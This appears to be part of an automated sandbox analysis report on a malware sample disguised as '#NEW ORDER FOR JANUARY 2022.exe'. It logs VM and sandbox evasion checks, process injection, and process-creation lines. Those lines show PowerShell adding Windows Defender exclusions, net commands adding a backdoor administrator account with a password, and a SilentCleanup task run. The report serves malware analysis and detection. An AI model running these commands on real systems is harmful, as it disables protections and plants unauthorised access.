                      Source: Yara matchFile source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL?
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLEV
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe TID: 900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 2874 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 4940Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072Thread sleep count: 2586 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072Thread sleep count: 2870 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 5584Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5052Thread sleep time: -24903104499507879s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852Thread sleep count: 3974 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852Thread sleep count: 5817 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6625Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3482
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2586
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6077
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2613
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 3974
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 5817
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating systemUSER
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VIRTUALBOXUSOFTWARE\Oracle\VirtualBox Guest Additions!noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 10FA008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: D96008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA7008
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /delJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exeJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /addJump to behavior
